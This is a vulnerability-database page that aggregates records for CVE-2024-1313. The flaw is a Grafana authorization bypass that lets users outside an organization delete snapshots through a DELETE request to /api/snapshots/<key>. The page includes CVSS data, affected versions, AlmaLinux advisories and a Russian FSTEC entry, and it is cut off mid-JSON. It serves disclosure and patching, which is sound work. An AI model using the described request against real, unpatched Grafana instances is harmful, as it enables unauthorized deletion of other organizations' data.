CVE-2024-1313 (GCVE-0-2024-1313)
Vulnerability from cvelistv5 – Published: 2024-03-26 17:24 – Updated: 2025-02-13 17:27
VLAI?
Title
Users outside an organization can delete a snapshot with its key
Summary
It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/<key> using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.
Grafana Labs would like to thank Ravid Mazon and Jay Chen of Palo
Alto Research for discovering and disclosing this vulnerability.
This issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.
Severity ?
6.5 (Medium)
CWE
- CWE-639 - Authorization Bypass Through User-Controlled Key
Assigner
References
Impacted products
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-1313",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-10T20:46:01.440788Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-10T20:46:07.773Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:33:25.596Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240524-0008/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "Grafana",
"repo": "https://github.com/grafana/grafana",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.5.18",
"status": "affected",
"version": "9.5.0",
"versionType": "semver"
},
{
"lessThan": "10.0.13",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThan": "10.1.9",
"status": "affected",
"version": "10.1.0",
"versionType": "semver"
},
{
"lessThan": "10.2.6",
"status": "affected",
"version": "10.2.0",
"versionType": "semver"
},
{
"lessThan": "10.3.5",
"status": "affected",
"version": "10.3.0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "10.4.0"
}
]
}
],
"configurations": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "To be exposed to this issue, a grafana instance must be configured with multiple organizations and have the snapshots feature turned on.\u003cbr\u003e"
}
],
"value": "To be exposed to this issue, a grafana instance must be configured with multiple organizations and have the snapshots feature turned on."
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Ravid Mazon"
},
{
"lang": "en",
"type": "finder",
"value": "Jay Chen"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u0026lt;key\u0026gt; using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\u003cbr\u003e\u003cp\u003e\u003cbr\u003eGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\u003cbr\u003e\u003cbr\u003eThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\u003cbr\u003e\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5."
}
],
"impacts": [
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-10T18:08:06.260Z",
"orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"shortName": "GRAFANA"
},
"references": [
{
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240524-0008/"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Users outside an organization can delete a snapshot with its key",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"assignerShortName": "GRAFANA",
"cveId": "CVE-2024-1313",
"datePublished": "2024-03-26T17:24:25.956Z",
"dateReserved": "2024-02-07T15:15:07.330Z",
"dateUpdated": "2025-02-13T17:27:36.664Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-1313",
"date": "2026-05-19",
"epss": "0.00032",
"percentile": "0.0925"
},
"fkie_nvd": {
"descriptions": "[{\"lang\": \"en\", \"value\": \"It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\\n\\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \\nAlto Research for discovering and disclosing this vulnerability.\\n\\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\\n\\n\"}, {\"lang\": \"es\", \"value\": \"Es posible que un usuario de una organizaci\\u00f3n diferente al propietario de una instant\\u00e1nea omita la autorizaci\\u00f3n y elimine una instant\\u00e1nea emitiendo una solicitud DELETE a /api/snapshots/ usando su clave de vista. Esta funcionalidad est\\u00e1 destinada a estar disponible solo para personas con permiso para escribir/editar la instant\\u00e1nea en cuesti\\u00f3n, pero debido a un error en la l\\u00f3gica de autorizaci\\u00f3n, las solicitudes de eliminaci\\u00f3n emitidas por un usuario sin privilegios en una organizaci\\u00f3n diferente a la del propietario de la instant\\u00e1nea se tratan. seg\\u00fan lo autorizado. Grafana Labs desea agradecer a Ravid Mazon y Jay Chen de Palo Alto Research por descubrir y revelar esta vulnerabilidad. Este problema afecta a Grafana: desde 9.5.0 antes de 9.5.18, desde 10.0.0 antes de 10.0.13, desde 10.1.0 antes de 10.1.9, desde 10.2.0 antes de 10.2.6, desde 10.3.0 antes de 10.3.5.\"}]",
"id": "CVE-2024-1313",
"lastModified": "2024-11-21T08:50:18.207",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security@grafana.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\", \"baseScore\": 6.5, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 3.6}]}",
"published": "2024-03-26T18:15:09.350",
"references": "[{\"url\": \"https://grafana.com/security/security-advisories/cve-2024-1313/\", \"source\": \"security@grafana.com\"}, {\"url\": \"https://security.netapp.com/advisory/ntap-20240524-0008/\", \"source\": \"security@grafana.com\"}, {\"url\": \"https://grafana.com/security/security-advisories/cve-2024-1313/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://security.netapp.com/advisory/ntap-20240524-0008/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": "[{\"source\": \"security@grafana.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-639\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-1313\",\"sourceIdentifier\":\"security@grafana.com\",\"published\":\"2024-03-26T18:15:09.350\",\"lastModified\":\"2025-02-13T18:16:23.613\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\\n\\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \\nAlto Research for discovering and disclosing this vulnerability.\\n\\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\"},{\"lang\":\"es\",\"value\":\"Es posible que un usuario de una organizaci\u00f3n diferente al propietario de una instant\u00e1nea omita la autorizaci\u00f3n y elimine una instant\u00e1nea emitiendo una solicitud DELETE a /api/snapshots/ usando su clave de vista. Esta funcionalidad est\u00e1 destinada a estar disponible solo para personas con permiso para escribir/editar la instant\u00e1nea en cuesti\u00f3n, pero debido a un error en la l\u00f3gica de autorizaci\u00f3n, las solicitudes de eliminaci\u00f3n emitidas por un usuario sin privilegios en una organizaci\u00f3n diferente a la del propietario de la instant\u00e1nea se tratan. seg\u00fan lo autorizado. Grafana Labs desea agradecer a Ravid Mazon y Jay Chen de Palo Alto Research por descubrir y revelar esta vulnerabilidad. Este problema afecta a Grafana: desde 9.5.0 antes de 9.5.18, desde 10.0.0 antes de 10.0.13, desde 10.1.0 antes de 10.1.9, desde 10.2.0 antes de 10.2.6, desde 10.3.0 antes de 10.3.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"}]}],\"references\":[{\"url\":\"https://grafana.com/security/security-advisories/cve-2024-1313/\",\"source\":\"security@grafana.com\"},{\"url\":\"https://security.netapp.com/advisory/ntap-20240524-0008/\",\"source\":\"security@grafana.com\"},{\"url\":\"https://grafana.com/security/security-advisories/cve-2024-1313/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://security.netapp.com/advisory/ntap-20240524-0008/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2024-1313/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://security.netapp.com/advisory/ntap-20240524-0008/\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-01T18:33:25.596Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-1313\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-06-10T20:46:01.440788Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-06-10T20:46:05.611Z\"}}], \"cna\": {\"title\": \"Users outside an organization can delete a snapshot with its key\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Ravid Mazon\"}, {\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Jay Chen\"}], \"impacts\": [{\"capecId\": \"CAPEC-137\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-137 Parameter Injection\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/grafana/grafana\", \"vendor\": \"Grafana\", \"product\": \"Grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"9.5.0\", \"lessThan\": \"9.5.18\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.13\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.1.0\", \"lessThan\": \"10.1.9\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.6\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.5\", \"versionType\": \"semver\"}, {\"status\": \"unaffected\", \"version\": \"10.4.0\"}], \"platforms\": [\"Linux\"], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2024-1313/\"}, {\"url\": \"https://security.netapp.com/advisory/ntap-20240524-0008/\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\\n\\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \\nAlto Research for discovering and disclosing this vulnerability.\\n\\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u0026lt;key\u0026gt; using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\u003cbr\u003e\u003cp\u003e\u003cbr\u003eGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \\nAlto Research for discovering and disclosing this vulnerability.\u003cbr\u003e\u003cbr\u003eThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\u003cbr\u003e\u003cbr\u003e\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639 Authorization Bypass Through User-Controlled Key\"}]}], \"configurations\": [{\"lang\": \"en\", \"value\": \"To be exposed to this issue, a grafana instance must be configured with multiple organizations and have the snapshots feature turned on.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"To be exposed to this issue, a grafana instance must be configured with multiple organizations and have the snapshots feature turned on.\u003cbr\u003e\", \"base64\": false}]}], \"providerMetadata\": {\"orgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"shortName\": \"GRAFANA\", \"dateUpdated\": \"2024-06-10T18:08:06.260Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-1313\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-13T17:27:36.664Z\", \"dateReserved\": \"2024-02-07T15:15:07.330Z\", \"assignerOrgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"datePublished\": \"2024-03-26T17:24:25.956Z\", \"assignerShortName\": \"GRAFANA\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
alsa-2024:2568
Vulnerability from osv_almalinux
Published
2024-04-30 00:00
Modified
2024-05-07 14:54
Summary
Moderate: grafana security update
Details
Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB.
Security Fix(es):
- grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)
- grafana: vulnerable to authorization bypass (CVE-2024-1313)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
References
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "grafana"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.2.10-16.el9_4.alma.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "grafana-selinux"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.2.10-16.el9_4.alma.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB \u0026 OpenTSDB.\n\nSecurity Fix(es):\n\n* grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)\n* grafana: vulnerable to authorization bypass (CVE-2024-1313)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"id": "ALSA-2024:2568",
"modified": "2024-05-07T14:54:57Z",
"published": "2024-04-30T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2024:2568"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2024-1313"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2024-1394"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2262921"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2271903"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/9/ALSA-2024-2568.html"
}
],
"related": [
"CVE-2024-1394",
"CVE-2024-1313"
],
"summary": "Moderate: grafana security update"
}
alsa-2024:3265
Vulnerability from osv_almalinux
Published
2024-05-22 00:00
Modified
2024-05-29 14:40
Summary
Important: grafana security update
Details
Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB.
Security Fix(es):
- golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)
- grafana: vulnerable to authorization bypass (CVE-2024-1313)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
References
| URL | Type | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "grafana"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.2.10-16.el8_10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "grafana-selinux"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.2.10-16.el8_10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "Grafana is an open source, feature rich metrics dashboard and graph editor for\nGraphite, InfluxDB \u0026 OpenTSDB.\n\nSecurity Fix(es):\n\n* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)\n* grafana: vulnerable to authorization bypass (CVE-2024-1313)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"id": "ALSA-2024:3265",
"modified": "2024-05-29T14:40:10Z",
"published": "2024-05-22T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2024:3265"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2024-1313"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2024-1394"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2262921"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2271903"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/8/ALSA-2024-3265.html"
}
],
"related": [
"CVE-2024-1394",
"CVE-2024-1313"
],
"summary": "Important: grafana security update"
}
BDU:2024-04116
Vulnerability from fstec - Published: 26.03.2024
VLAI Severity ?
Title
Уязвимость веб-инструмента представления данных Grafana, связанная с обходом авторизации, позволяющая нарушителю обойти процесс авторизации и удалить моментальный снимок
Description
Уязвимость веб-инструмента представления данных Grafana связана с обходом авторизации. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, обойти процесс авторизации и удалить моментальный снимок, отправив запрос на удаление в /api/snapshots/
Severity ?
Vendor
ООО «Ред Софт», Grafana Labs
Software Name
РЕД ОС (запись в едином реестре российских программ №3751), Grafana
Software Version
7.3 (РЕД ОС), от 10.0.0 до 10.0.13 (Grafana), от 10.1.0 до 10.1.9 (Grafana), от 10.2.0 до 10.2.6 (Grafana), от 10.3.0 до 10.3.5 (Grafana), от 9.5.0 до 9.5.18 (Grafana)
Possible Mitigations
Для Grafana:
https://grafana.com/security/security-advisories/cve-2024-1313/
Для РедОС: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
Reference
https://grafana.com/security/security-advisories/cve-2024-1313/
https://redos.red-soft.ru/support/secure/
CWE
CWE-639
{
"CVSS 2.0": "AV:N/AC:L/Au:S/C:N/I:C/A:N",
"CVSS 3.0": "AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb, Grafana Labs",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "7.3 (\u0420\u0415\u0414 \u041e\u0421), \u043e\u0442 10.0.0 \u0434\u043e 10.0.13 (Grafana), \u043e\u0442 10.1.0 \u0434\u043e 10.1.9 (Grafana), \u043e\u0442 10.2.0 \u0434\u043e 10.2.6 (Grafana), \u043e\u0442 10.3.0 \u0434\u043e 10.3.5 (Grafana), \u043e\u0442 9.5.0 \u0434\u043e 9.5.18 (Grafana)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0414\u043b\u044f Grafana:\nhttps://grafana.com/security/security-advisories/cve-2024-1313/\n\n\u0414\u043b\u044f \u0420\u0435\u0434\u041e\u0421: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "26.03.2024",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "06.06.2024",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "27.05.2024",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2024-04116",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2024-1313",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "\u0420\u0415\u0414 \u041e\u0421 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), Grafana",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb \u0420\u0415\u0414 \u041e\u0421 7.3 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751)",
